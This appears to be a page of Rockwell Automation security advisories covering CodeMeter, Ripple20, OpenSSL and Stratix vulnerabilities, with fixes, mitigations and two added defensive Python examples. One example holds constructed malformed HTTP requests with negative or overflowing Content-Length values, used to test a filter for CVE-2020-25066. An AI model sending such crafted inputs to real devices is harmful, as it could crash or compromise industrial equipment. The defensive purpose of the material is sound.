FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems AG CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime CmWAN server to send back packets containing data from the heap.

Wibu-Systems AG score:

CVSS v3.1 Base Score: 7.5/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

-------------------UPDATE: 22 Nov 2022----------------------

CVE-2021-41057: CWE-269

A local attacker could cause a Denial of Service by overwriting existing files on the affected system.

Wibu-Systems AG Score:
CVSS v3.1 Base Score: 7.1/10 (High)
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Risk Mitigation & User Action

Customers using the affected FactoryTalk® Activation Manager and/or Studio 5000 Logix Designer® are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability | Suggested Actions
CVE-2021-20093 | Update to FactoryTalk Activation Manager 4.05.03 or later
CVE-2021-20094 | Update to FactoryTalk Activation Manager 4.05.03 or later
CVE-2021-41057 | Update to FactoryTalk Activation Manager 4.06.11 or later

For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center, Standard Views -> Software Latest Versions -> FactoryTalk Activation.

Customers may update Wibu-Systems CodeMeter independently of FactoryTalk Activation Manager or Studio 5000 Logix Designer® by installing Wibu-Systems AG CodeMeter v7.30a. Please refer to this support page to determine whether CodeMeter v7.30a is compatible with the installed versions of Rockwell Automation software.

During installation, Rockwell Automation products bind CodeMeter Runtime to the local host adapter and disable the Network Server and CmWAN Server ports. Therefore, if the default installation is not modified, Rockwell Automation software is not susceptible to these vulnerabilities over a network connection. Default port 22350 is required only if activation licenses are hosted from (served by) the machine; such a license-serving host does need the Network Server reachable and should be protected with the network controls listed below.
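The safe-by-default claim above is only true while nobody has turned the Network Server or CmWAN Server on, so it is worth verifying on every workstation that runs FactoryTalk Activation Manager or Logix Designer. The following is an added example, not Rockwell Automation or Wibu-Systems code, that reads the text of `netstat -ano` from a Windows host and reports any TCP listener on 22350 or 22351 that is bound to something other than a loopback address. The sample output it runs on is constructed for the example.

```python
"""Flag CodeMeter network listeners that are reachable from the network.

Added example for this page; it is not Rockwell Automation or Wibu-Systems
code. The advisory above states that Rockwell installs bind CodeMeter
Runtime to the local host and leave the Network Server (22350/TCP) and
CmWAN Server (22351/TCP) listeners disabled, so a listener on those ports
bound to 0.0.0.0 or :: is a deviation worth reviewing. The function parses
the text of `netstat -ano` from Windows; the sample output is constructed."""
import ipaddress
import re

CODEMETER_TCP_PORTS = {22350: "CodeMeter Network Server", 22351: "CodeMeter CmWAN Server"}

# One netstat -ano row: Proto, Local Address, Foreign Address, [State], PID.
# TCP rows in states other than LISTENING do not match and are skipped.
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(LISTENING)\s+)?(\d+)\s*$")


def split_endpoint(endpoint: str):
    """'0.0.0.0:22350' -> ('0.0.0.0', 22350); '[::]:22351' -> ('::', 22351)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def is_loopback(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:          # '*' or a hostname: treat as not loopback
        return False


def exposed_codemeter_listeners(netstat_output: str):
    """Return the TCP listeners on CodeMeter ports that are not bound to loopback."""
    findings = []
    for line in netstat_output.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        proto, local, _foreign, state, pid = m.groups()
        if proto != "TCP" or state != "LISTENING":
            continue
        host, port = split_endpoint(local)
        if port in CODEMETER_TCP_PORTS and not is_loopback(host):
            findings.append({"port": port, "service": CODEMETER_TCP_PORTS[port],
                             "bind": host, "pid": int(pid)})
    return findings


# Constructed sample of `netstat -ano` output: 22350 is listening on both the
# loopback (expected) and the wildcard address (not expected), and 22351 on [::].
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:22350        0.0.0.0:0              LISTENING       4123
  TCP    0.0.0.0:22350          0.0.0.0:0              LISTENING       4123
  TCP    [::]:22351             [::]:0                 LISTENING       4123
  TCP    192.168.1.50:49722     192.168.1.10:44818     ESTABLISHED     3310
  UDP    0.0.0.0:500            *:*                                    1188
"""

if __name__ == "__main__":
    for f in exposed_codemeter_listeners(SAMPLE_NETSTAT):
        print(f"{f['service']} ({f['port']}/tcp) bound to {f['bind']} in PID {f['pid']}")
```

A hit on a designated license server is expected (the advisory notes that hosting activations requires 22350); the point is to find the workstation where someone enabled the Network Server and never turned it off. On a host with PowerShell the same data can be pulled with `Get-NetTCPConnection -State Listen` and fed to the parser after formatting, or checked directly.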

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that Wibu CodeMeter Network Server and CmWAN Server (Default Port# 22350/TCP and 22351/TCP) are blocked from unauthorized sources.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to UDP Port# 2222 (CIP), TCP/UDP Port# 44818 (CIP), and TCP/UDP Port# 2221 (CIP Security) using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor control products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-210-02

Critical
PN1508 | Treck Ripple20 TCP/IP Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
November 01, 2022
Last Updated:
August 15, 2025
CVE IDs:
CVE-2020-11914, CVE-2020-11910, CVE-2020-11901, CVE-2020-11907, CVE-2020-11911, CVE-2020-11912, CVE-2020-25066, CVE-2020-11906
Products:
Flex I/O, 1408 PowerMonitor 1000, 1732E ArmorBlock I/O, 1426 PowerMonitor 5000
CVSS Scores (v3.1):
9.8, 9.1, 5.0, 3.7, 3.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number

8.0

Revision History
Version 8.0 – August 15, 2025. Updated Kinetix vulnerability discrepancies
Version 7.0 – August 8, 2025. Updated affected products list and user actions
Version 6.0 – August 13, 2024. Updated affected products list and user actions
Version 5.0 – November 1, 2022. Added patch information for additional products
Version 4.0 – May 17, 2022. Updated patch information for PowerFlex 755T and 6000T
Version 3.0 – February 9, 2021. Updated for ICSA-20-353-01.
Version 2.1 – January 13, 2021. Updated to reflect additional disclosure.
Version 2.0 – July 15, 2020. Updated table to reflect affected products and versions.
Version 1.0 – June 16, 2020. Initial Release.

Executive Summary

Treck, a real-time embedded Internet Protocol software vendor, reported several vulnerabilities (named "Ripple20") to Rockwell Automation that were discovered by security researchers at JSOF, a security vendor and research organization.  The embedded TCP/IP stack (versions earlier than 6.0.1.66) from Treck is used by many different technology vendors including Rockwell Automation. These vulnerabilities, if successfully exploited, may result in remote code execution, denial-of-service, or sensitive information disclosure.

Begin Update 3.0
On December 18, 2020, Treck reported four additional vulnerabilities that were discovered by security researchers at Intel. The following components of the embedded TCP/IP stack (versions 6.0.1.67 and prior) are affected: HTTP Server, IPv6, and DHCPv6. These vulnerabilities, if successfully exploited, may result in denial-of-service conditions or remote code execution.
End Update 3.0

Since this disclosure is part of a large multi-party coordination effort with the CERT/CC and ICS-CERT, not every vulnerability reported by Treck impacts Rockwell Automation. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding CVE ID.


Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures are provided herein.

Affected Products

Affected Product Family Affected Versions CVE IDs
5094-AEN2SFPR/XT
5094-AEN2TR/XT
5094-AENSFPR/XT
5094-AENTR/XT
1.011-4.011 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
5069-AENTR 3.011-4.011 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1734-AENT/R 4.001-6.012 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1738-AENT/R 4.001-6.012 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-16CFGM12R
1732E-8X8M12DR
1732E-IB16M12DR
1732E-IB16M12R
1732E-OB16M12DR
1732E-OB16M12R
2.011-2.012 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1791ES-ID2SSIR 1.001 (no CVE marked)
1799ER-IQ10XOQ10 2.011 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1794-AENTR/XT 1.011-1.017 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-12X4M12QCDR
1732E-16CFGM12QCR
1732E-16CFGM12QCWR
1732E-12X4M12P5QCDR
1732E-16CFGM12P5QCR
1.011-1.015 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-16CFGM12P5QCWR 1.011-2.011 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
PowerMonitor™ 5000 4.19 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914
PowerMonitor 1000 4.10 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914
ArmorStart® ST+ Motor Controller 1.001 CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911
Kinetix® 5500 All* CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Kinetix® 5700 All* CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Kinetix® 5100 1.001 CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
PowerFlex 755T
PowerFlex 6000T
All* CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911
CIP Safety™ Encoder All* CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911

Begin Update 3.0:
Affected Product Family Affected Versions CVE
1734-AENT/R 4.001-6.012 CVE-2020-25066
1738-AENT/R 4.001-6.012 CVE-2020-25066
1794-AENTR
1794-AENTR/XT
1.011-1.017 CVE-2020-25066
1732E-16CFGM12R
1732E-8X8M12DR
1732E-IB16M12DR
1732E-IB16M12R
1732E-OB16M12DR
1732E-OB16M12R
2.011-2.012 CVE-2020-25066
1799ER-IQ10XOQ10 2.011 CVE-2020-25066
1732E-12X4M12QCDR
1732E-16CFGM12QCR
1732E-16CFGM12QCWR
1732E-12X4M12P5QCDR
1732E-16CFGM12P5QCR
1.011-1.015 CVE-2020-25066
1732E-16CFGM12P5QCWR 1.011-2.011 CVE-2020-25066
PowerMonitor™ 5000 4.19 CVE-2020-25066
PowerMonitor 1000 4.10 CVE-2020-25066
End Update 3.0

 

Begin Update 6.0
Affected Product Family Affected Versions CVE
PowerFlex 527 all CVE-2020-25066
End Update 6.0

 

Vulnerability Details

Begin Update 3.0:
CVE-2020-25066

A vulnerability in the Treck HTTP Server components allows an attacker to cause a denial-of-service condition. This vulnerability may also result in arbitrary code execution.

CVSSv3.1 Score: 9.8/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
End Update 3.0


CVE-2020-11901
There is an improper input validation issue in the DNS resolver component when handling a sent packet. A remote, unauthenticated attacker may be able to inject arbitrary code on the target system using a maliciously crafted packet.

CVSSv3.1 Score: 9.1/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-11906
There is an improper input validation issue in the Ethernet Link Layer component. An adjacent, unauthenticated attacker can send a malicious Ethernet packet that can trigger an integer underflow event leading to a crash or segment fault on the target device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11907
There is an improper handling of length parameter consistency issue in the TCP component. A remote, unauthenticated attacker can send a malformed TCP packet that can trigger an integer underflow event leading to a crash or segmentation fault on the device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11910
There is an improper input validation issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that may expose data present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11911
There is an improper access control issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that can lead to higher privileges in permissions assignments for some critical resources on the destination device.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2020-11912
There is an improper input validation issue in the IPv6 component. A remote, unauthenticated attacker can send a malicious packet that may expose some data that is present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11914
There is an improper input validation issue in the ARP component. An unauthenticated, local attacker can send a malicious Layer-2 ARP packet that could lead to unintended exposure of some sensitive information on the target device.

CVSSv3.1 Score: 3.1/LOW
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Update 2.1: Rockwell Automation is aware of the additional Treck TCP/IP Stack vulnerabilities disclosed (ICSA-20-353-01). The potential impact of these vulnerabilities is currently being investigated, and this advisory will be updated when the investigation concludes.

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.
CVE Suggested Actions
CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914:

For successful exploitation, these vulnerabilities require malformed TCP/IP packets to reach the destination device and an active network connection. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be placed behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense-in-depth strategies.

The CERT/CC has provided IDS rules to support additional mitigations for these vulnerabilities. These rules can be found on their GitHub page.

ICS-CERT has provided additional network mitigations in their public disclosure.

Begin Update 3.0:
CVE Suggested Actions
CVE-2020-25066 Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header.

ICS-CERT has provided additional network mitigations in their public disclosure.

End Update 3.0


Available Fixes:

Update 8.0 August 15, 2025

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: 1794-AENTR/XT
Suggested Actions: Apply firmware v2.011 or later (Download).

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: 1738-AENT, 1738-AENTR
Suggested Actions: Apply firmware v6.011 or later (Download).

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: 1734-AENT/K, 1734-AENTR/K
Suggested Actions: Apply firmware v5.019 or later for series B (Download), or v7.011 or later for series C (Download).

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: 5069-AENTR
Suggested Actions: Apply firmware v4.012 or later (Download).

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: 5094-AEN2SFPR/XT, 5094-AEN2TR/XT, 5094-AENSFPR/XT, 5094-AENTR/XT
Suggested Actions: Apply firmware v5.012 or later (Download).

CVE: CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: Kinetix 5700
Suggested Actions: Apply v13 or later (Download).

CVE: CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: Kinetix 5500
Suggested Actions: Apply v7.013 or later (Download).

CVE: CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: Kinetix 5100
Suggested Actions: Apply v3.001 or later (Download).

CVE: CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Affected Product: PowerFlex 755T, PowerFlex 6000T
Suggested Actions: Apply 6.005 or later for PF755T. Apply R8 or later for PF6000T. (Download)

End Update 8.0 August 15, 2025
Update 7.0 August 7, 2025

CVE: CVE-2020-25066

Affected Product Family: 1734-AENT/K, 1734-AENTR/K
Suggested Actions: Apply firmware v5.019 or later for series B, or v7.011 or later for series C.

Affected Product Family: 1738-AENT, 1738-AENTR
Suggested Actions: Apply firmware v6.011 or later.

Affected Product Family: 1794-AENTR/XT
Suggested Actions: Apply firmware v2.011 or later.

Affected Product Family: 1732E-16CFGM12R, 1732E-8X8M12DR, 1732E-IB16M12DR, 1732E-IB16M12R, 1732E-OB16M12DR, 1732E-OB16M12R
Suggested Actions: Apply firmware 3.011 or later.

Affected Product Family: 1799ER-IQ10XOQ10
Suggested Actions: Apply firmware 3.011 or later.

Affected Product Family: 1732E-12X4M12QCDR, 1732E-16CFGM12QCR, 1732E-16CFGM12QCWR, 1732E-12X4M12P5QCDR, 1732E-16CFGM12P5QCR
Suggested Actions: Apply firmware 3.011 or later.

Affected Product Family: 1732E-16CFGM12P5QCWR
Suggested Actions: Apply firmware 3.011 or later.

End Update 7.0

Begin Update 6.0

CVE: CVE-2020-25066
Affected Product Family: PowerFlex 527
Suggested Actions: Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header.

End Update 6.0
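The firewall rule suggested for CVE-2020-25066 in Update 3.0 and Update 6.0 above can be prototyped as a request pre-check in front of an affected HTTP server; the following Python is an added example for this advisory, not Rockwell Automation, Treck or CERT/CC code. It goes one step beyond the advisory's wording by also dropping lengths that would not fit a signed 32-bit integer (an assumption of the example, since such values wrap negative in a naive parser); the sample requests are constructed.

```python
"""Pre-filter HTTP requests whose Content-Length is not a plain decimal number,
the condition the CVE-2020-25066 workaround asks perimeter firewalls to drop.
Added example for this advisory, not Rockwell Automation or Treck code; the
sample requests below are constructed, not captured from any device."""
import re

# RFC 9110 defines Content-Length as 1*DIGIT.  Anything else ("-1", "+5", "",
# "0x10", "5 ") is not a length at all; a lax parser that feeds it through a
# signed atoi()-style conversion is what makes a negative value dangerous.
_DIGITS_ONLY = re.compile(rb"[0-9]+")

# Assumption of this example: values that do not fit a signed 32-bit integer
# are treated like negative ones, because they wrap negative in such a parser.
MAX_SAFE_LENGTH = 2**31 - 1


def content_length_verdict(request: bytes, max_length: int = MAX_SAFE_LENGTH) -> str:
    """Return 'drop', 'allow' or 'no-header' for one raw HTTP request.

    Only the header block (everything before the first blank line) is read, so
    text in the body cannot trigger a false verdict.  Every Content-Length
    header is examined, including duplicates and comma-joined lists, because a
    receiver may honour whichever copy the sender chose.
    """
    head = re.split(rb"\r?\n\r?\n", request, maxsplit=1)[0]
    seen = False
    for line in re.split(rb"\r?\n", head)[1:]:  # [0] is the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"content-length":
            continue
        seen = True
        for piece in value.split(b","):         # "Content-Length: 5, 5" form
            piece = piece.strip()
            if not _DIGITS_ONLY.fullmatch(piece) or int(piece) > max_length:
                return "drop"
    return "allow" if seen else "no-header"


# Constructed sample traffic toward a hypothetical I/O module web server.
SAMPLE_REQUESTS = {
    "normal post": b"POST /cgi HTTP/1.1\r\nHost: io-module\r\nContent-Length: 11\r\n\r\nstate=ready",
    "negative length": b"POST /cgi HTTP/1.1\r\nHost: io-module\r\nContent-Length: -1\r\n\r\n",
    "duplicate header": b"POST /cgi HTTP/1.1\r\nHost: io-module\r\nContent-Length: 4\r\ncontent-length: -4\r\n\r\nabcd",
    "wraps negative": b"POST /cgi HTTP/1.1\r\nHost: io-module\r\nContent-Length: 4294967295\r\n\r\n",
    "body only": b"POST /cgi HTTP/1.1\r\nHost: io-module\r\n\r\nContent-Length: -1",
}


def classify_samples() -> dict:
    """Verdict for every constructed sample, keyed by its label."""
    return {label: content_length_verdict(req) for label, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for label, verdict in classify_samples().items():
        print(f"{label:18} -> {verdict}")
```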

 

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that ICMPv4, TCP, ARP and DNS traffic originating from unauthorized sources is blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.

Software/PC-based Mitigation Strategies
  • Use of Microsoft® AppLocker or other similar whitelisting applications can help mitigate risk. Information on using AppLocker with Rockwell Automation® products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and that user/service account access to shared resources (such as a database) is only granted with the minimum number of rights needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://kb.cert.org/vuls/id/257161
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-353-01

 

PN1607 | PN1607 | New Open SSL Vulnerability
Published Date:
October 31, 2022
Last Updated:
October 31, 2022
Products:
FactoryTalk View
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Executive Summary

Rockwell Automation is aware of and currently monitoring the OpenSSL vulnerability that was initially announced on Tuesday, October 25th. On Tuesday, November 1st, the full vulnerability details were disclosed, and a patch was made available by the vendor. As part of our commitment to transparency and to protecting our customers’ security, we are evaluating all Rockwell products for this third-party vulnerability. If any products are affected by this vulnerability, we will provide an update to this notification. We look forward to working with our customers to satisfy any concerns they may have.

High
PN1601 | PN1601 | Stratix Products Vulnerable to Multiple Vulnerabilities
Published Date:
October 27, 2022
Last Updated:
October 27, 2022
CVE IDs:
CVE-2020-3209, CVE-2020-3200, CVE-2021-1385, CVE-2020-3516, CVE-2021-1446
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 5800 Switch, Stratix 5410 Ind Distribution Switch
CVSS Scores:
6.8, 7.2, 8.8, 6.5, 7.7, 8.6, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation is aware of multiple vulnerabilities that impact Cisco IOS® XE and Cisco IOS software contained within Stratix® devices. Exploitation of these vulnerabilities could potentially lead to, but is not limited to, a denial-of-service condition and remote code execution.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • Stratix 5800 Switches
  • Stratix 5400/5410 Switches

Vulnerability Details

CVE-2020-3229 - Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The administrator GUI lacks correct handling of RBAC, which may allow a malicious user to send modified HTTP requests to the targeted device. If exploited, a read-only remote attacker could potentially execute commands or configuration changes as the administrator user.

CVE-2020-3219 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Due to insufficient validation of user input, this vulnerability could allow a malicious user to inject custom input into the web UI. If exploited, a remote attacker could potentially execute arbitrary code with administrative privileges on the operating system.

CVE-2021-1446 - Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
CVSS Base Score 8.6/10 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

A vulnerability in the DNS application layer gateway (ALG) functionality used by Network Address Translation (NAT) in Cisco IOS XE software could allow an unauthenticated, remote attacker to cause an affected device to reload.

CVE-2020-3200 - Cisco IOS and IOS XE Software Secure Shell Denial-of-Service Vulnerability
CVSS Base Score 7.7/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the Secure Shell (SSH) server code of Cisco IOS software and Cisco IOS XE software could allow an authenticated, remote attacker to cause an affected device to reload.

CVE-2020-3211 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper input sanitization, this vulnerability could allow a malicious user with administrative privileges to submit specially crafted input in the web UI. If exploited, a remote attacker could potentially execute arbitrary commands with root privileges on the operating system.

CVE-2020-3218 - Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper validation of user supplied input, a malicious user could potentially create a file on the target device and upload a second malicious file to the device. If exploited, a user could execute arbitrary code with root privileges on the underlying Linux shell.

CVE-2020-3209 - Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
CVSS Base Score 6.8/10 (Medium)
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The root cause of this vulnerability is an improper check on the area code that manages the verification of the digital signatures of the system files during the initial boot process. If exploited, a malicious user could potentially install and boot malicious software image or execute unsigned binaries on the targeted device. A malicious user could exploit this vulnerability by loading unsigned software on the affected device.

